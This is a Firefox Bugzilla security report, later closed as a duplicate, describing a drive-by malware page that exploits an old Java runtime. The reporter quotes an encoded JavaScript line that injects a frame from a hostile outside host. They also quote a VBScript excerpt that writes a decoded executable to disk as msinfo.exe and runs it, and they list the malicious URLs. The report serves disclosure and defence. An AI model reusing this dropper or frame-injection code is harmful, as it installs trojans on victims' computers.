Closed Bug 275429 Opened 20 years ago Closed 20 years ago

JRE 1.4.2_05 exploit in the wild

Categories

(Firefox :: General, defect)

Product:
Firefox
Component:
General
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
RESOLVED DUPLICATE of bug 271559

People

(Reporter: jshpro2, Assigned: bugzilla)

References

(
URL
)

Details

I beleive I have found a possible exploit, while browseing the web I came across
a page that caused several notifications from my virus scanner:

http://4arrowsoutfitters.com/crack/tradewinds/unlock/code/
(Go to the page at your own risk)

I noticed the line:
var
str="%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%72%62%33%37%2E%63%6F%6D%2F%63%6E%74%2F%70%72%6F%63%65%73%73%6F%72%3F%61%72%61%6C%65%6C%22%3E%27%29%3B";
in the javascript, uppon decodeing that line it was printing a frame to:

http://www.t058.com/inst/index.php?id=28129&c=Uji1i1ar0BI35vyd7nSV5v6JMUUFI0O3

This page appeared as if it was loading a java class to run some trivial code.
I found code that looked like it was running some sort of exploit useing
vbscript/ javascript/ and/or java

An excerpt of one of the vbscripts it was running is:
	h0 = ""    	
    	i = 1
    	Do While i < Len(c0)
		h0 = h0 & chr(cint("&h" & mid(c0, i, 2)))
        	i = i + 2
    	Loop

	set wsh = CreateObject("WScript.Shell")
	path = "C:\\"
	set fs = CreateObject("Scripting.FileSystemObject")
	set ts = fs.CreateTextFile(path + "msinfo.exe", true, false)
   	ts.Write(h0)
   	ts.Close()
	wsh.Run(path + "msinfo.exe")
self.close()

It looks like they are downloading an executable to the victims computer
(trojan.bytedownloader)... I sent the code to a friend of mine and when he ran
it, he got a windows XP error that critical system files have been replaced with
unknown files and that he needs to reinstall. I have tested this on my machine,
I only get a notification from Norton that the file was prevented from
downloading, it appears as if the author of the code has also implemented a
counter to see how many computers have been infected. I do not intend to do any
further investigation on my part. The reason I am reporting this to firefox
instead of reporting it to sun microsystems of microsoft is because Firefox
should have some security measure in place to prevent code like this from even
running. Firefox is known for their security and I would expect an exploit like
this to affect IE only, I hope this issue is resolved shortly. I do not have the
time or motivation to send this report to any other places so if the correct
place for me to contact was a virus center or something like that you have
permission to foward it on with my email address.

Regards,
Josh
jshpro2@gmail.com
The t058.com site contains several exploit attempts aimed at IE (ms-its:
protocol object, the vbscript downloader you quote, a suspicious .gif file), and
a java applet that apparently can take advantage of holes in Java at least up to
JRE 1.4.2_05 (from other reports). There was a recently announced vulnerability
in that JRE version, perhaps they use that.

Turning off Java will protect you. Upgrading to JRE 1.5 or 1.4.2_06 would
protect you if the exploit uses the known hole in 1.4.2_05, but that's less clear.

I've seen a couple other sites that loaded the same trojan-laden frame from t058.com

Really a JRE bug, but our users don't care whose fault it is. We want to roll
out a system to warn users about known vulnerabilities in 3rd party software.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Summary: Exploit in browser → JRE 1.4.2_05 exploit in the wild
Whiteboard: DUPEME

*** This bug has been marked as a duplicate of 271559 ***
Group: security
Status: NEW → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE
Whiteboard: DUPEME
You need to log in before you can comment on or make changes to this bug.